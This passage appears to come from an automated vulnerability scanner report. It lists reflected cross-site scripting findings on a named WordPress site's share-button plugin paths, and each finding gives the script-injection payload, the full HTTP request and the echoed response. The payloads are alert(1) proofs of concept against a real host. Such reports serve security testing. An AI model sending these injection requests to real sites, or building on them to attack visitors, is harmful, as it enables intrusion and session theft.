Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:46 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:15:47 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js?26cbc\"><script>alert(1)</script>8d0b33eac8c=1" type="hidden" />
...[SNIP]...

1.164. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c67a"><script>alert(1)</script>2ac3708dc28 was submitted in the REST URL parameter 1. This input was echoed as 6c67a\"><script>alert(1)</script>2ac3708dc28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content6c67a"><script>alert(1)</script>2ac3708dc28/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content6c67a\"><script>alert(1)</script>2ac3708dc28/plugins/sexybookmarks/js/shareaholic-perf.js/page/2" type="hidden" />
...[SNIP]...

1.165. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfb7a"><script>alert(1)</script>6b15bddf239 was submitted in the REST URL parameter 2. This input was echoed as bfb7a\"><script>alert(1)</script>6b15bddf239 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsbfb7a"><script>alert(1)</script>6b15bddf239/sexybookmarks/js/shareaholic-perf.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:06 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/pluginsbfb7a\"><script>alert(1)</script>6b15bddf239/sexybookmarks/js/shareaholic-perf.js/page/2" type="hidden" />
...[SNIP]...

1.166. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af530"><script>alert(1)</script>21dd516c846 was submitted in the REST URL parameter 3. This input was echoed as af530\"><script>alert(1)</script>21dd516c846 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarksaf530"><script>alert(1)</script>21dd516c846/js/shareaholic-perf.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarksaf530\"><script>alert(1)</script>21dd516c846/js/shareaholic-perf.js/page/2" type="hidden" />
...[SNIP]...

1.167. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0ea"><script>alert(1)</script>b16941717be was submitted in the REST URL parameter 4. This input was echoed as 7d0ea\"><script>alert(1)</script>b16941717be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js7d0ea"><script>alert(1)</script>b16941717be/shareaholic-perf.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js7d0ea\"><script>alert(1)</script>b16941717be/shareaholic-perf.js/page/2" type="hidden" />
...[SNIP]...

1.168. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef57b"><script>alert(1)</script>0e42677720 was submitted in the REST URL parameter 5. This input was echoed as ef57b\"><script>alert(1)</script>0e42677720 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.jsef57b"><script>alert(1)</script>0e42677720/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.jsef57b\"><script>alert(1)</script>0e42677720/page/2" type="hidden" />
...[SNIP]...

1.169. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a805"><script>alert(1)</script>cf09bdcc993 was submitted in the REST URL parameter 6. This input was echoed as 8a805\"><script>alert(1)</script>cf09bdcc993 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page8a805"><script>alert(1)</script>cf09bdcc993/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:57 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page8a805\"><script>alert(1)</script>cf09bdcc993/2" type="hidden" />
...[SNIP]...

1.170. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd333"><script>alert(1)</script>297b5913584 was submitted in the REST URL parameter 7. This input was echoed as fd333\"><script>alert(1)</script>297b5913584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2fd333"><script>alert(1)</script>297b5913584 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:20:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2fd333\"><script>alert(1)</script>297b5913584" type="hidden" />
...[SNIP]...

1.171. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 553f5"><script>alert(1)</script>44b4574d50b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 553f5\"><script>alert(1)</script>44b4574d50b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2?553f5"><script>alert(1)</script>44b4574d50b=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:39 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:16:39 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2?553f5\"><script>alert(1)</script>44b4574d50b=1" type="hidden" />
...[SNIP]...

1.172. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1840b"><script>alert(1)</script>8fd264d131a was submitted in the REST URL parameter 1. This input was echoed as 1840b\"><script>alert(1)</script>8fd264d131a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content1840b"><script>alert(1)</script>8fd264d131a/plugins/sexybookmarks/js/shareaholic-publishers.min.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:50 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:16:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content1840b\"><script>alert(1)</script>8fd264d131a/plugins/sexybookmarks/js/shareaholic-publishers.min.js" type="hidden" />
...[SNIP]...

1.173. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac14"><script>alert(1)</script>36c637fbf14 was submitted in the REST URL parameter 2. This input was echoed as 4ac14\"><script>alert(1)</script>36c637fbf14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins4ac14"><script>alert(1)</script>36c637fbf14/sexybookmarks/js/shareaholic-publishers.min.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins4ac14\"><script>alert(1)</script>36c637fbf14/sexybookmarks/js/shareaholic-publishers.min.js" type="hidden" />
...[SNIP]...

1.174. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f79"><script>alert(1)</script>bf35875d5a0 was submitted in the REST URL parameter 3. This input was echoed as 11f79\"><script>alert(1)</script>bf35875d5a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks11f79"><script>alert(1)</script>bf35875d5a0/js/shareaholic-publishers.min.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:45 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks11f79\"><script>alert(1)</script>bf35875d5a0/js/shareaholic-publishers.min.js" type="hidden" />
...[SNIP]...

1.175. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e773"><script>alert(1)</script>e3669742604 was submitted in the REST URL parameter 4. This input was echoed as 8e773\"><script>alert(1)</script>e3669742604 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js8e773"><script>alert(1)</script>e3669742604/shareaholic-publishers.min.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:16 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js8e773\"><script>alert(1)</script>e3669742604/shareaholic-publishers.min.js" type="hidden" />
...[SNIP]...

1.176. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf20"><script>alert(1)</script>4eec3538e5e was submitted in the REST URL parameter 5. This input was echoed as caf20\"><script>alert(1)</script>4eec3538e5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

